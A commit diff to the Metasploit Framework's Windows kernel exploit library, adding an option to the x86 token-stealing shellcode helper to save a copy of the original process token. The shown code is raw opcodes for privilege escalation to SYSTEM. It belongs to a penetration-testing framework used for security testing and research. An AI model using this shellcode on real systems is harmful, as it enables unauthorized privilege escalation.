Support writing a copy of the original token

zeroSteiner · zeroSteiner · commit 6543b08eb4be · 2014-08-04T11:49:00.000-07:00
diff --git a/lib/msf/core/exploit/local/windows_kernel.rb b/lib/msf/core/exploit/local/windows_kernel.rb
@@ -108,12 +108,14 @@ def open_device(file_name, desired_access, share_mode, creation_disposition, fla
   #
   # @param target [Hash] The target information containing the offsets to _KPROCESS,
   #   _TOKEN, _UPID and _APLINKS.
+  # @param backup_token [Integer] An optional location to write a copy of the
+  #   original token to so it can be restored later.
   # @param arch [String] The architecture to return shellcode for. If this is nil,
   #   the arch will be guessed from the target and then module information.
   # @return [String] The token stealing shellcode.
   # @raise [ArgumentError] If the arch is incompatible.
   #
-  def token_stealing_shellcode(target, arch = nil)
+  def token_stealing_shellcode(target, backup_token = nil, arch = nil)
     arch = target.opts['Arch'] if arch.nil? && target && target.opts['Arch']
     if arch.nil? && module_info['Arch']
       arch = module_info['Arch']
@@ -124,15 +126,19 @@ def token_stealing_shellcode(target, arch = nil)
       fail ArgumentError, 'Invalid arch'
     end
 
+    tokenstealing = ''
     case arch
     when ARCH_X86
-      tokenstealing =  "\x52"                                                        # push edx                         # Save edx on the stack
+      tokenstealing << "\x52"                                                        # push edx                         # Save edx on the stack
       tokenstealing << "\x53"                                                        # push ebx                         # Save ebx on the stack
       tokenstealing << "\x33\xc0"                                                    # xor eax, eax                     # eax = 0
       tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                                # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
       tokenstealing << "\x8b\x40" + target['_KPROCESS']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
       tokenstealing << "\x8b\xc8"                                                    # mov ecx, eax
       tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
+      unless backup_token.nil?
+        tokenstealing << "\x89\x1d" + [backup_token].pack('V')                       # mov dword ptr ds:backup_token, ebx   # Optionaly write a copy of the token to the address provided
+      end
       tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
       tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
       tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
